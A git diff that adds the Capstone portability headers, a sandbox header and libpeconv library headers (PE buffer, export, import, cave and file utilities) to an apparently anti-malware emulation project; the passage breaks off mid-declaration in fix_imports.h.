a/ai_anti_malware/capstone/include/platform.h b/ai_anti_malware/capstone/include/platform.h new file mode 100644 index 0000000..b0d1a2d --- /dev/null +++ b/ai_anti_malware/capstone/include/platform.h @@ -0,0 +1,110 @@ +/* Capstone Disassembly Engine */ +/* By Axel Souchet & Nguyen Anh Quynh, 2014 */ + +#ifndef CAPSTONE_PLATFORM_H +#define CAPSTONE_PLATFORM_H + +// handle C99 issue (for pre-2013 VisualStudio) +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < 1800) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif + +#else +// VisualStudio 2013+ -> C99 is supported +#include +#endif + +#else +// not MSVC -> C99 is supported +#include +#endif + + +// handle C99 issue (for pre-2013 VisualStudio) +#if defined(CAPSTONE_HAS_OSXKERNEL) || (defined(_MSC_VER) && (_MSC_VER <= 1700 || defined(_KERNEL_MODE))) +// this system does not have inttypes.h + +#if defined(_MSC_VER) && (_MSC_VER < 1600 || defined(_KERNEL_MODE)) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#endif + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/windowsce/intrin.h b/ai_anti_malware/capstone/include/windowsce/intrin.h new file mode 100644 index 0000000..fde4bde --- /dev/null +++ b/ai_anti_malware/capstone/include/windowsce/intrin.h @@ -0,0 +1,12 @@ + +#if defined(_MSC_VER) && defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) && !defined(__INTRIN_H_) && !defined(_INTRIN) +#define _STDINT + +#ifdef _M_ARM +#include +#if (_WIN32_WCE >= 0x700) && defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) +#include +#endif +#endif // _M_ARM + +#endif diff --git a/ai_anti_malware/capstone/include/windowsce/stdint.h b/ai_anti_malware/capstone/include/windowsce/stdint.h new file mode 100644 index 0000000..014a163 --- /dev/null +++ b/ai_anti_malware/capstone/include/windowsce/stdint.h @@ -0,0 +1,133 @@ + +#if defined(_MSC_VER) && defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) && !defined(_STDINT_H_) && !defined(_STDINT) +#define _STDINT + +typedef __int8 + int8_t, + int_least8_t; + +typedef __int16 + int16_t, + int_least16_t; + +typedef __int32 + int32_t, + int_least32_t, + int_fast8_t, + int_fast16_t, + int_fast32_t; + +typedef __int64 + int64_t, + intmax_t, + int_least64_t, + int_fast64_t; + +typedef unsigned __int8 + uint8_t, + uint_least8_t; + +typedef unsigned __int16 + uint16_t, + uint_least16_t; + +typedef unsigned __int32 + uint32_t, + uint_least32_t, + uint_fast8_t, + uint_fast16_t, + uint_fast32_t; + +typedef unsigned __int64 + uint64_t, + uintmax_t, + uint_least64_t, + uint_fast64_t; + +#ifndef _INTPTR_T_DEFINED +#define _INTPTR_T_DEFINED +typedef __int32 intptr_t; +#endif + +#ifndef _UINTPTR_T_DEFINED +#define _UINTPTR_T_DEFINED +typedef unsigned __int32 uintptr_t; +#endif + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 + +#define INT_LEAST8_MIN INT8_MIN +#define INT_LEAST16_MIN INT16_MIN +#define INT_LEAST32_MIN INT32_MIN +#define INT_LEAST64_MIN INT64_MIN +#define INT_LEAST8_MAX INT8_MAX +#define INT_LEAST16_MAX INT16_MAX +#define INT_LEAST32_MAX INT32_MAX +#define INT_LEAST64_MAX INT64_MAX +#define UINT_LEAST8_MAX UINT8_MAX +#define UINT_LEAST16_MAX UINT16_MAX +#define UINT_LEAST32_MAX UINT32_MAX +#define UINT_LEAST64_MAX UINT64_MAX + +#define INT_FAST8_MIN INT8_MIN +#define INT_FAST16_MIN INT32_MIN +#define INT_FAST32_MIN INT32_MIN +#define INT_FAST64_MIN INT64_MIN +#define INT_FAST8_MAX INT8_MAX +#define INT_FAST16_MAX INT32_MAX +#define INT_FAST32_MAX INT32_MAX +#define INT_FAST64_MAX INT64_MAX +#define UINT_FAST8_MAX UINT8_MAX +#define UINT_FAST16_MAX UINT32_MAX +#define UINT_FAST32_MAX UINT32_MAX +#define UINT_FAST64_MAX UINT64_MAX + +#define INTPTR_MIN INT32_MIN +#define INTPTR_MAX INT32_MAX +#define UINTPTR_MAX UINT32_MAX + +#define INTMAX_MIN INT64_MIN +#define INTMAX_MAX INT64_MAX +#define UINTMAX_MAX UINT64_MAX + +#define PTRDIFF_MIN INTPTR_MIN +#define PTRDIFF_MAX INTPTR_MAX + +#ifndef SIZE_MAX +#define SIZE_MAX UINTPTR_MAX +#endif + +#define SIG_ATOMIC_MIN INT32_MIN +#define SIG_ATOMIC_MAX INT32_MAX + +#define WCHAR_MIN 0x0000 +#define WCHAR_MAX 0xffff + +#define WINT_MIN 0x0000 +#define WINT_MAX 0xffff + +#define INT8_C(x) (x) +#define INT16_C(x) (x) +#define INT32_C(x) (x) +#define INT64_C(x) (x ## LL) + +#define UINT8_C(x) (x) +#define UINT16_C(x) (x) +#define UINT32_C(x) (x ## U) +#define UINT64_C(x) (x ## ULL) + +#define INTMAX_C(x) INT64_C(x) +#define UINTMAX_C(x) UINT64_C(x) + +#endif diff --git a/ai_anti_malware/head.h b/ai_anti_malware/head.h new file mode 100644 index 0000000..adc6ef8 --- /dev/null +++ b/ai_anti_malware/head.h @@ -0,0 +1,31 @@ +#pragma once +#define _CRT_SECURE_NO_WARNINGS +#include +#include +#include +#include +#include +#include +#include +#include + + +#include "unicorn/include/unicorn/unicorn.h" +#include "capstone/include/capstone/capstone.h" +#pragma comment(lib, "unicorn/unicorn.lib") +#pragma comment(lib, "capstone/capstone.lib") +#include "libpeconv/include/peconv.h" +#include "native_struct.h" +struct BasicPeInfo { + std::string inputFilePath; + bool isX64; + uint64_t RecImageBase; + uint64_t entryPoint; + uint64_t imageEnd; + bool isRelocated; + uint8_t* peBuffer; + size_t peSize; + PIMAGE_NT_HEADERS ntHead64; + PIMAGE_NT_HEADERS32 ntHead32; +}; +#include "sandbox.h" diff --git a/ai_anti_malware/libpeconv/libpeconv/CMakeLists.txt b/ai_anti_malware/libpeconv/libpeconv/CMakeLists.txt new file mode 100644 index 0000000..5961016 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/CMakeLists.txt @@ -0,0 +1,83 @@ +cmake_minimum_required ( VERSION 2.8 ) +project ( libpeconv ) + +set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /MT") + +include_directories ( + include +) + +set (srcs + src/pe_hdrs_helper.cpp + src/pe_mode_detector.cpp + src/pe_raw_to_virtual.cpp + src/pe_virtual_to_raw.cpp + src/relocate.cpp + src/buffer_util.cpp + src/remote_pe_reader.cpp + src/imports_loader.cpp + src/delayed_imports_loader.cpp + src/fix_imports.cpp + src/pe_loader.cpp + src/pe_dumper.cpp + src/exports_lookup.cpp + src/function_resolver.cpp + src/hooks.cpp + src/exported_func.cpp + src/exports_mapper.cpp + src/resource_parser.cpp + src/file_util.cpp + src/resource_util.cpp + src/imports_uneraser.cpp + src/load_config_util.cpp + src/caves.cpp + src/util.cpp + src/fix_dot_net_ep.cpp + src/find_base.cpp + src/peb_lookup.cpp +) + +set (hdrs + include/peconv.h + include/peconv/pe_hdrs_helper.h + include/peconv/pe_mode_detector.h + include/peconv/pe_raw_to_virtual.h + include/peconv/pe_virtual_to_raw.h + include/peconv/relocate.h + include/peconv/util.h + include/peconv/buffer_util.h + include/peconv/remote_pe_reader.h + include/peconv/imports_loader.h + include/peconv/delayed_imports_loader.h + include/peconv/fix_imports.h + include/peconv/pe_loader.h + include/peconv/pe_dumper.h + include/peconv/exports_lookup.h + include/peconv/function_resolver.h + include/peconv/hooks.h + include/peconv/exported_func.h + include/peconv/exports_mapper.h + include/peconv/resource_parser.h + include/peconv/file_util.h + include/peconv/resource_util.h + include/peconv/imports_uneraser.h + include/peconv/load_config_util.h + include/peconv/load_config_defs.h + include/peconv/caves.h + include/peconv/find_base.h + include/peconv/peb_lookup.h + src/fix_dot_net_ep.h #not in API +) + +add_library ( ${PROJECT_NAME} STATIC ${hdrs} ${srcs} ) + +if(PECONV_LIB_INSTALL) + include(GNUInstallDirs) + + install(TARGETS ${PROJECT_NAME} + ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR} + LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} + RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR}) + + install(DIRECTORY "include/" DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}) +endif() diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv.h new file mode 100644 index 0000000..698ec87 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv.h @@ -0,0 +1,30 @@ +/** +* @file +* @brief Master include file, including everything else. +*/ + +#pragma once + +#include "peconv/buffer_util.h" +#include "peconv/util.h" +#include "peconv/pe_hdrs_helper.h" +#include "peconv/pe_mode_detector.h" +#include "peconv/pe_raw_to_virtual.h" +#include "peconv/pe_virtual_to_raw.h" +#include "peconv/relocate.h" +#include "peconv/remote_pe_reader.h" +#include "peconv/imports_loader.h" +#include "peconv/pe_loader.h" +#include "peconv/pe_dumper.h" +#include "peconv/exports_lookup.h" +#include "peconv/function_resolver.h" +#include "peconv/hooks.h" +#include "peconv/exports_mapper.h" +#include "peconv/caves.h" +#include "peconv/fix_imports.h" +#include "peconv/delayed_imports_loader.h" +#include "peconv/resource_parser.h" +#include "peconv/load_config_util.h" +#include "peconv/peb_lookup.h" +#include "peconv/find_base.h" + diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/buffer_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/buffer_util.h new file mode 100644 index 0000000..7383ad3 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/buffer_util.h @@ -0,0 +1,76 @@ +/** +* @file +* @brief Definitions of the used buffer types. Functions for their allocation and deallocation. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Validates pointers, checks if the particular field is inside the given buffer. Sizes must be given in bytes. + */ + bool validate_ptr( + IN const void* buffer_bgn, + IN SIZE_T buffer_size, + IN const void* field_bgn, + IN SIZE_T field_size + ); + +//----------------------------------------------------------------------------------- +// +// supported buffers: +// + /** + A buffer allocated on the heap of a process, not aligned to the beginning of a memory page. + */ + typedef PBYTE UNALIGNED_BUF; + + /** + A buffer allocated in a virtual space of a process, aligned to the beginning of a memory page. + */ + typedef PBYTE ALIGNED_BUF; + +// +// alloc/free unaligned buffers: +// + /** + Allocates a buffer on the heap. Can be used in the cases when the buffer does not have to start at the beginning of a page. + */ + UNALIGNED_BUF alloc_unaligned(size_t buf_size); + + // + /** + Frees buffer allocated by alloc_unaligned. + */ + void free_unaligned(UNALIGNED_BUF section_buffer); + +// +// alloc/free aligned buffers: +// + + /** + Allocates a buffer of a virtual memory (using VirtualAlloc). Can be used in the cases when the buffer have to be aligned to the beginning of a page. + */ + ALIGNED_BUF alloc_aligned(size_t buffer_size, DWORD protect, ULONGLONG desired_base=NULL, bool is_x64 = false); + + /** + Frees buffer allocated by alloc_aligned. + */ + bool free_aligned(ALIGNED_BUF buffer, size_t buffer_size=0); + + //PE buffers (wrappers) + + /** + Allocates an aligned buffer for a PE file. + */ + ALIGNED_BUF alloc_pe_buffer(size_t buffer_size, DWORD protect, ULONGLONG desired_base=NULL); + + /** + Free the memory allocated with alloc_pe_buffer. + */ + bool free_pe_buffer(ALIGNED_BUF buffer, size_t buffer_size=0); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/caves.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/caves.h new file mode 100644 index 0000000..7b5b5d7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/caves.h @@ -0,0 +1,27 @@ +/** +* @file +* @brief Functions related to finding caves in the loaded PE file. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Finds cave at the end of the image (extend last section's raw size without extending the full image size) + */ + PBYTE find_ending_cave(BYTE* module_ptr, size_t module_size, const DWORD cave_size, const DWORD cave_charact=IMAGE_SCN_MEM_READ); + + /** + Finds cave in the difference between the original raw size, and the raw size rounded to the aligmnent + */ + PBYTE find_alignment_cave(BYTE* modulePtr, size_t moduleSize, const DWORD cave_size, const DWORD req_charact = IMAGE_SCN_MEM_READ); + + /** + Finds cave at the end of the section, that comes from a NULL padding or INT3 padding + */ + PBYTE find_padding_cave(BYTE* modulePtr, size_t moduleSize, const size_t minimal_size, const DWORD req_charact = IMAGE_SCN_MEM_READ); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/delayed_imports_loader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/delayed_imports_loader.h new file mode 100644 index 0000000..7c875f9 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/delayed_imports_loader.h @@ -0,0 +1,61 @@ +/** +* @file +* @brief Parsing and filling the Delayload Import Table. +*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" +#include "function_resolver.h" + +#if (defined(_WIN32_WINNT) && _WIN32_WINNT > 0x0601) || __MINGW32__ //Windows SDK version 6.1 (Windows 7) +#define DELAYLOAD_IMPORTS_DEFINED +#endif + +#ifndef DELAYLOAD_IMPORTS_DEFINED +#include "pshpack4.h" + +typedef struct _IMAGE_DELAYLOAD_DESCRIPTOR { + union { + DWORD AllAttributes; + struct { + DWORD RvaBased : 1; // Delay load version 2 + DWORD ReservedAttributes : 31; + } DUMMYSTRUCTNAME; + } Attributes; + + DWORD DllNameRVA; // RVA to the name of the target library (NULL-terminate ASCII string) + DWORD ModuleHandleRVA; // RVA to the HMODULE caching location (PHMODULE) + DWORD ImportAddressTableRVA; // RVA to the start of the IAT (PIMAGE_THUNK_DATA) + DWORD ImportNameTableRVA; // RVA to the start of the name table (PIMAGE_THUNK_DATA::AddressOfData) + DWORD BoundImportAddressTableRVA; // RVA to an optional bound IAT + DWORD UnloadInformationTableRVA; // RVA to an optional unload info table + DWORD TimeDateStamp; // 0 if not bound, + // Otherwise, date/time of the target DLL + +} IMAGE_DELAYLOAD_DESCRIPTOR, *PIMAGE_DELAYLOAD_DESCRIPTOR; + +typedef const IMAGE_DELAYLOAD_DESCRIPTOR *PCIMAGE_DELAYLOAD_DESCRIPTOR; + +#include "poppack.h" +#endif + +namespace peconv { + + /** + Get the Delayload Imports directory. Returns the pointer to the first descriptor. The size of the directory is passed via variable dir_size. + */ + IMAGE_DELAYLOAD_DESCRIPTOR* get_delayed_imps(IN const BYTE* modulePtr, IN const size_t moduleSize, OUT size_t &dir_size); + + /** + Fill the Delayload Imports in the given module. + \param modulePtr : the pointer to the module where the imports needs to be filled. + \param moduleBase : the base to which the module was relocated, it may (or not) be the same as modulePtr + \param func_resolver : the resolver that will be used for loading the imports + \return : true if resolving all succeeded, false otherwise + */ + bool load_delayed_imports(BYTE* modulePtr, const ULONGLONG moduleBase, t_function_resolver* func_resolver = nullptr); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/exported_func.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exported_func.h new file mode 100644 index 0000000..4500813 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exported_func.h @@ -0,0 +1,123 @@ +/** +* @file +* @brief A definition of ExportedFunc class - used for storing the details of the exported function. Helper functions related to the export parsing. +*/ + +#pragma once + +#include +#include +#include +#include + +namespace peconv { + + /** + Check if the pointer redirects to a forwarder - if so, return the length, otherwise return 0. + */ + size_t forwarder_name_len(BYTE* fPtr); + + /** + get the DLL name without the extension + */ + std::string get_dll_shortname(const std::string& str); + + /** + Get the function name from the string in a format: DLL_name.function_name + */ + std::string get_func_name(const std::string& str); + + /** + Convert ordinal value to the ordinal string (in a format #[ordinal]) + */ + std::string ordinal_to_string(DWORD func_ordinal); + + /** + Check if the given string is in a format typical for storing ordinals (#[ordinal]) + */ + bool is_ordinal_string(const std::string& str); + + /** + Get the ordinal value from the ordinal string (in a format #[ordinal]) + */ + DWORD ordinal_string_to_val(const std::string& str); + + /** + Convert the function in a format: DLL_name.function_name into a normalized form (DLL name in lowercase). + */ + std::string format_dll_func(const std::string& str); + + /** + A class storing the information about the exported function. + */ + class ExportedFunc + { + public: + /** + Converts the name to the normalized format. + */ + static std::string formatName(std::string name); + + std::string libName; + std::string funcName; + DWORD funcOrdinal; + bool isByOrdinal; + + //default constructor: + ExportedFunc() : funcOrdinal(0), isByOrdinal(false) {} + + ExportedFunc(const ExportedFunc& other); + ExportedFunc(std::string libName, std::string funcName, DWORD funcOrdinal); + ExportedFunc(std::string libName, DWORD funcOrdinal); + ExportedFunc(const std::string &forwarderName); + + /** + Compare two functions with each other. + Gives the priority to the named functions: if one of the compared functions is unnamed, the named one is treated as smaller. + If both functions are unnamed, the function with the smaller ordinal is treated as smaller. + Otherwise, the function with the shorter name is treated as smaller. + */ + bool operator < (const ExportedFunc& other) const + { + //if only one function is named, give the preference to the named one: + const size_t thisNameLen = this->funcName.length(); + const size_t otherNameLen = other.funcName.length(); + if (thisNameLen == 0 && otherNameLen > 0) { + return false; + } + if (thisNameLen > 0 && otherNameLen == 0) { + return true; + } + //select by shorter lib name: + int cmp = libName.compare(other.libName); + if (cmp != 0) { + return cmp < 0; + } + if (thisNameLen == 0 || otherNameLen == 0) { + return this->funcOrdinal < other.funcOrdinal; + } + if (thisNameLen != otherNameLen) { + return thisNameLen < otherNameLen; + } + cmp = funcName.compare(other.funcName); + return cmp < 0; + } + + /** + Gets a string representation of the variable. Full info about the function: library, name, ordinal. + */ + std::string toString() const; + + /** + Gets a string representation of the variable. Short info about the function: only function name or ordinal (if the name is missing). + */ + std::string nameToString() const; + + bool isValid() const + { + return (funcName != "" || funcOrdinal != -1); + } + }; + +}; //namespace peconv + diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_lookup.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_lookup.h new file mode 100644 index 0000000..a3b1895 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_lookup.h @@ -0,0 +1,50 @@ +/** +* @file +* @brief Searching specific functions in PE's Exports Table. +*/ + +#pragma once +#include + +#include "pe_hdrs_helper.h" +#include "function_resolver.h" +#include "exports_mapper.h" + +#include +#include +#include + +namespace peconv { + + /** + Gets the function address by the name. Uses Export Table lookup. + WARNING: doesn't work for the forwarded functions. + */ + FARPROC get_exported_func(PVOID modulePtr, LPSTR wanted_name); + + /** + Gets list of all the functions from a given module that are exported by names. + */ + size_t get_exported_names(PVOID modulePtr, std::vector &names_list); + + /** + Function resolver using Export Table lookup. + */ + class export_based_resolver : default_func_resolver { + public: + /** + Get the address (VA) of the function with the given name, from the given DLL. + Uses Export Table lookup as a primary method of finding the import. On failure it falls back to the default Functions Resolver. + \param func_name : the name of the function + \param lib_name : the name of the DLL + \return Virtual Address of the exported function + */ + virtual FARPROC resolve_func(LPSTR lib_name, LPSTR func_name); + }; + + /** + Read the DLL name from the Export Table. + */ + LPSTR read_dll_name(HMODULE modulePtr); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_mapper.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_mapper.h new file mode 100644 index 0000000..e490861 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/exports_mapper.h @@ -0,0 +1,140 @@ +/** +* @file +* @brief A definition of ExportsMapper class. Creates a lookup of all the exported functions from the supplied DLLs. Allows to associate an address with a corresponding function. +*/ + +#pragma once + +#include + +#include +#include +#include +#include + +#include "pe_hdrs_helper.h" +#include "pe_raw_to_virtual.h" +#include "peconv/exported_func.h" +#include "peconv/file_util.h" + +namespace peconv { + + class ExportsMapper { + + public: + + /** + Appends the given DLL to the lookup table of exported functions. Returns the number of functions exported from this DLL (not forwarded). + \param moduleName : name of the DLL + \param modulePtr : buffer containing the DLL in a Virtual format + \param moduleBase : a base address to which the given DLL was relocated + */ + size_t add_to_lookup(std::string moduleName, HMODULE modulePtr, ULONGLONG moduleBase); + + /** + Appends the given DLL to the lookup table of exported functions. Returns the number of functions exported from this DLL (not forwarded). + Assumes that the module was relocated to the same address as is the address of the given buffer (modulePtr). + (A wrapper for the case if we are adding a DLL that was loaded within the current process.) + \param moduleName : name of the DLL + \param modulePtr : buffer containing the DLL in a Virtual format. + */ + size_t add_to_lookup(std::string moduleName, HMODULE modulePtr) + { + return add_to_lookup(moduleName, modulePtr, reinterpret_cast(modulePtr)); + } + + /** + Find the set of Exported Functions that can be mapped to the given VA. Includes forwarders, and function aliases. + */ + const std::set* find_exports_by_va(ULONGLONG va) const + { + std::map>::const_iterator itr = va_to_func.find(va); + if (itr != va_to_func.end()) { + const std::set &fSet = itr->second; + return &fSet; + } + return NULL; + } + + /** + Retrieve the full path of the DLL with the given short name. + */ + std::string get_dll_path(std::string short_name) const + { + std::map::const_iterator found = this->dll_shortname_to_path.find(short_name); + if (found == dll_shortname_to_path.end()) { + return ""; + } + return found->second; + } + + /** + Retrieve the full name of the DLL (including the extension) using its short name (without the extension). + */ + std::string get_dll_fullname(std::string short_name) const + { + std::string dll_path = get_dll_path(short_name); + if (dll_path.length() == 0) return ""; + + return get_file_name(dll_path); + } + + /** + Find an Exported Function that can be mapped to the given VA, + */ + const ExportedFunc* find_export_by_va(ULONGLONG va) const + { + const std::set* exp_set = find_exports_by_va(va); + if (exp_set == NULL) return NULL; + + std::set::iterator fItr = exp_set->begin(); + const ExportedFunc* func = &(*fItr); + return func; + } + + void print_va_to_func(std::stringstream &stream) const; + void print_func_to_va(std::stringstream &stream) const; + + + private: + enum ADD_FUNC_RES { RES_INVALID = 0, RES_MAPPED = 1, RES_FORWARDED = 2 }; + ADD_FUNC_RES add_function_to_lookup(HMODULE modulePtr, ULONGLONG moduleBase, size_t moduleSize, ExportedFunc &currFunc, DWORD callRVA); + + bool add_forwarded(ExportedFunc &currFunc, DWORD callRVA, PBYTE modulePtr, size_t moduleSize); + bool add_to_maps(ULONGLONG va, ExportedFunc &currFunc); + + size_t resolve_forwarders(const ULONGLONG va, ExportedFunc &currFunc); + size_t make_ord_lookup_tables(PVOID modulePtr, size_t moduleSize, std::map &va_to_ord); + + protected: + /** + Add a function and a VA into a mutual mapping. + */ + void associateVaAndFunc(ULONGLONG va, const ExportedFunc& func) + { + va_to_func[va].insert(func); + func_to_va[func] = va; + } + + /** + A map associating VA of the function with the related exports. + */ + std::map> va_to_func; + + /** + A map associating an exported functions with its forwarders. + */ + std::map> forwarders_lookup; + + /** + A map associating an exported functions with its VA. + */ + std::map func_to_va; + + /** + A map associating DLL shortname with the full path to the DLL. + */ + std::map dll_shortname_to_path; + }; + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/file_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/file_util.h new file mode 100644 index 0000000..7e46dd8 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/file_util.h @@ -0,0 +1,55 @@ +/** +* @file +* @brief Functions related to operations on files. Wrappers for read/write. +*/ + +#pragma once + +#include +#include + +#include "buffer_util.h" + +namespace peconv { + + /** + Maps a file with the given path and copies its raw content into the output buffer. + If read_size is not zero, it reads maximum read_size of bytes. If read_size is zero, it reads the full file. + The actual read size is returned back in read_size. + Automatically allocates a buffer of the required size. + */ + peconv::ALIGNED_BUF load_file(IN const char *filename, OUT size_t &r_size); + + /** + Reads a raw content of the file with the given path. + If read_size is not zero, it reads maximum read_size of bytes. If read_size is zero, it reads the full file. + The actual read size is returned back in read_size. + Automatically allocates a buffer of the required size. + */ + peconv::ALIGNED_BUF read_from_file(IN const char *path, IN OUT size_t &read_size); + + /** + Writes a buffer of bytes into a file of given path. + \param path : the path to the output file + \param dump_data : the buffer to be dumped + \param dump_size : the size of data to be dumped (in bytes) + \return true if succeeded, false if failed + */ + bool dump_to_file(IN const char *path, IN PBYTE dump_data, IN size_t dump_size); + + /** + Free the buffer allocated by load_file/read_from_file + */ + void free_file(IN peconv::ALIGNED_BUF buffer); + + /** + Get the file name from the given path. + */ + std::string get_file_name(IN const std::string full_path); + + /** + Get the directory name from the given path. It assumes that a directory name always ends with a separator ("/" or "\") + */ + std::string get_directory_name(IN const std::string full_path); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/find_base.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/find_base.h new file mode 100644 index 0000000..f49b030 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/find_base.h @@ -0,0 +1,20 @@ +/** +* @file +* @brief Functions related to finding a base to which the module was relocated. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Try to find a base to which the PE file was relocated, basing on the filled relocations. + WARNING: the found base is an estimate, and sometimes may not be fully accurate. + \param module_ptr : the module which's base is being searched + \param module_size : the size of the given module + \return the base to which the module was relocated + */ + ULONGLONG find_base_candidate(IN BYTE *module_ptr, IN size_t module_size); +}; diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/fix_imports.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/fix_imports.h new file mode 100644 index 0000000..a915df7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/fix_imports.h @@ -0,0 +1,119 @@ +/** +* @file +* @brief Functions and classes responsible for fixing Import Table. A definition of ImportedDllCoverage class. +*/ + +#pragma once + +#include + +#include + +#include +#include + +#include + +#include "pe_hdrs_helper.h" +#include "exports_lookup.h" +#include "exports_mapper.h" + +#define MIN_DLL_LEN 5 + +namespace peconv { + + /** + a helper class that allows to store information about functions that could not be covered by the given mapping + */ + class ImpsNotCovered + { + public: + ImpsNotCovered() {} + ~ImpsNotCovered() {} + + /* + Number of stored records + */ + size_t count() { return thunkToAddr.size(); } + + void insert(ULONGLONG thunk, ULONGLONG searchedAddr); + + std::map thunkToAddr; //addresses of not recovered functions with their thunks (call_via) + }; + + /** + fix imports in the given module, using the given map of all available exports + */ + bool fix_imports(IN OUT PVOID modulePtr, IN size_t moduleSize, IN const peconv::ExportsMapper& exportsMap, OUT OPTIONAL peconv::ImpsNotCovered* notCovered); + + /** + a helper class that allows to find out where the functions are imported from + */ + class ImportedDllCoverage + { + public: + /** + A constructor of an object of ImportedDllCoverage class. + \param _addresses : the list of filled imports (VAs): the addresses to be covered + \param _exportsMap : the map of the exports of all the loaded DLLs (the space in which we will be searching) + */ + ImportedDllCoverage(std::set& _addresses, const peconv::ExportsMapper& _exportsMap) + : addresses(_addresses), exportsMap(_exportsMap) + { + } + + /** + Checks if all the addresses can be covered by one DLL. If yes, this dll will be saved into: dllName. + \return true if the covering DLL for the addresses was found. false otherwise. + */ + bool findCoveringDll(); + + /** + Maps the addresses from the set to functions from the given 